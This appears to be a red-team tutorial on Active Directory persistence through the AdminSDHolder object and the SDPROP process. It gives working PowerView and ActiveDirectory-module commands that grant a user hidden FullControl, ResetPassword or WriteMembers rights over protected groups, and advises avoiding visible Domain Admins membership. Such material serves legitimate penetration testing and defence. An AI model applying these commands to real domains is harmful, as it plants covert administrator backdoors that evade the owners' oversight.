Resides in the System container of a domain and used to control the permissions -using an ACL - for certain built-in privileged groups (called ProtectedGroups). These are protected and privileged groups with elevated permissions:
This container contains an ACL template that runs every hour via a batch that runs every hour called Security Descriptor Propagator (SDPROP) compares the ACL of protected groups and members with the ACL of AdminSDHolder and any differences are overwritten on the object ACL.
Once you have gained access as a domain admin, it is not recommended during a Red Teaming activity to add yourself to the Domain Admins group. Rather you can assign yourself Full Control permissions on the Domain Admins group, which is equivalent to being part of the Domain Admins group but not appearing within it as shown in the figure:
Doing so however, since Domain Admins is a protected grup, the AdminSDHolder will go and reset all ACLs using the default template and this is done on all protected groups.
So the ACLs have to be changed at the AdminSDHolder level to maintain persistence!
In 60 minutes (when SDPROP runs), the user will be added with Full Control to the ACL of groups like Domain Admins without actually being a member of it.
Add FullControl permissions for a user to the AdminSDHolder using PowerView as Domain Admin (from Domain Controller).
With PowerView:
Add-DomainObjectAcl -TargetIdentity "CN=AdminSDHolder,CN=System,DC=<domain>,DC=<domain>,DC=<domain>" -PrincipalIdentity "<user to use for persistence>" -Rights All -PrincipalDomain "<FQDN domain>" -TargetDomain "<FQDN domain>" -Verbose
With ActiveDirectory module:
Set-ADACL -DistinguishedName 'CN=AdminSDHolder,CN=System,DC=<domain>,DC=<domain>,DC=<domain>' -Principal '<user to use for persistence>' -Verbose
Other interesting permissions (ResetPassword, WriteMembers) for a user to the AdminSDHolder:
Add-DomainobjectAcl -Targetidentity 'CN=AdminSDHolder,CN=System,DC=<domain>,DC=<domain>,DC=<domain>' -Principalidentity '<user to use for persistence>' -Rights ResetPassword -PrincipalDomain '<FQDN domain>' -TargetDomain '<FQDN domain>' -verbose
Add-DomainobjectAcl -Targetidentity 'CN=AdminSDHolder,CN=System,DC=<domain>,DC=<domain>,DC=<domain>' -Principalidentity '<user to use for persistence>' -Rights WriteMembers -PrincipalDomain '<FQDN domain>' -TargetDomain '<FQDN domain>' -verbose
Run SDProp manually using Invoke-SDPropagator.ps1 to speed up the process instead of waiting 1 hour.